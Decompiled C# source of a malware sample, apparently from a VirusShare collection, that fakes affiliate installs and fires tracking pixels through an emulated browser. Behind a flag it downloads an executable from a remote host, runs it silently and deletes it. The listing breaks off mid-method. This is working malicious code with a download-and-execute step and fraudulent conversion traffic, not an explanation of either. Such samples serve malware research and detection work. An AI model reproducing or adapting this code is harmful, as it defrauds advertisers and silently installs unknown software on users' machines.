// Decompiled with JetBrains decompiler // Type: AffiliateExecuterNoWin.Program // Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe using HTTPAgent; using Microsoft.Win32; using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Reflection; using System.Text.RegularExpressions; using System.Windows.Forms; namespace AffiliateExecuterNoWin { internal static class Program { private static string trackerUrlAndVersion; [STAThread] private static void Main(string[] args) { string str1 = "http://coolfbskins.info/getitnow"; string appName = "hazidtacp"; bool flag1 = false; string URL = "http://whatismyipaddress.com/"; bool flag2 = false; string str2 = "gamewrangler_v2.exe"; string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2; Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2"; if (new DateTime(3000, 1, 1) < DateTime.Now) return; Agent agent = new Agent(); agent.EmulateBrowser(); if (flag1) { string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0]; string savedIps = Program.GetSavedIPs(appName); if (savedIps.IndexOf(data) >= 0) return; Program.SetSavedIPs(appName, savedIps + data + ";"); } if (!string.IsNullOrEmpty(str1)) agent.Referer = str1; string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0]; agent.GetURL(data1); string referer = agent.Referer; agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F"); agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/"); agent.Referer = ""; agent.GetURL("http://www.facetheme.com/install_redirect.php"); string upper = Guid.NewGuid().ToString().ToUpper(); agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0"); agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/"); agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft"); agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560"); agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft"; string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID="); Program.GetRecursivePixels(agent, url2); agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft"; agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560"); if (!flag2) return; if (Directory.Exists("C:\\Users\\Public\\Documents\\")) str2 = "C:\\Users\\Public\\Documents\\" + str2; agent.getURL2File(url1, str2); try { Process.Start(str2, "/s").WaitForExit(); System.IO.File.Delete(str2); } catch { } } private static void GetRecursivePixels(Agent agent, string html) { html = Regex.Replace(html, "", ""); List stringList = new List(); stringList.AddRange((IEnumerable) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1")); stringList.AddRange((IEnumerable) DataExtractor.ExtractDataArray(html, "